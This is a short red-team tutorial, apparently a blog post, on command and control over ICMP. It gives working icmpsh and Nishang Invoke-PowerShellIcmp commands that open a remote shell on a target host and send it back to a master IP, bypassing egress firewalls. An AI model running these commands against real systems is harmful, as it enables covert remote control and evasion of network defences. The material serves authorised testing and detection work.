Command and Control – ICMP
Most systems in internal networks are behind firewalls and corporate proxies in order to control inbound and outbound Internet traffic. Firewalls can block reverse and bind TCP connections. However ICMP traffic most of the times is permitted. Therefore it is possible to use this protocol as a covert channel in order to obtain a shell and execute commands remotely on a target host.
This is an old technique which was used most of the times in restricted environments to receive a shell but in nowadays with the spread of Red Team engagements it can be used as another method to execute commands by using ICMP traffic and bypass egress filtering.
The tool icmpsh can be used to perform this attack effectively. Bernardo Damele imported this into his tool sqlmap which can be triggered with the –os-pwn switch.
The following commands will disable all ICMP echo replies which is essential for the tool to work properly and will start a listener which will wait for ICMP packets from the target host:
sysctl -w net.ipv4.icmp_echo_ignore_all=1 ./icmpsh_m.py 192.168.100.3 192.168.100.4
The GitHub repository of the icmpsh tool contains also a binary which needs to be transferred and executed on the target host. The following command will send ICMP traffic to the master host:
icmpsh.exe -t 192.168.100.3
A shell will received over ICMP and commands can be executed through this channel.
Daniel Compton developed a script to automate the process. The only input that this script requires is the IP address of the target host. This script is contained in the icmpsh repository on GitHub.
There are various other tools that exist online as alternatives to perform command and control over ICMP like PiX-C2.
Nishang framework contains a PowerShell module which can be used in combination with icmpsh python script to obtain a shell over ICMP. On the master host the following command will wait for any incoming ICMP packets.
./icmpsh_m.py 192.168.100.3 192.168.100.4
On the target host the PowerShellIcmp module requires only the master IP address:
Import-Module .\Invoke-PowerShellIcmp.ps1 Invoke-PowerShellIcmp 192.168.100.3
The connection will received from the master host.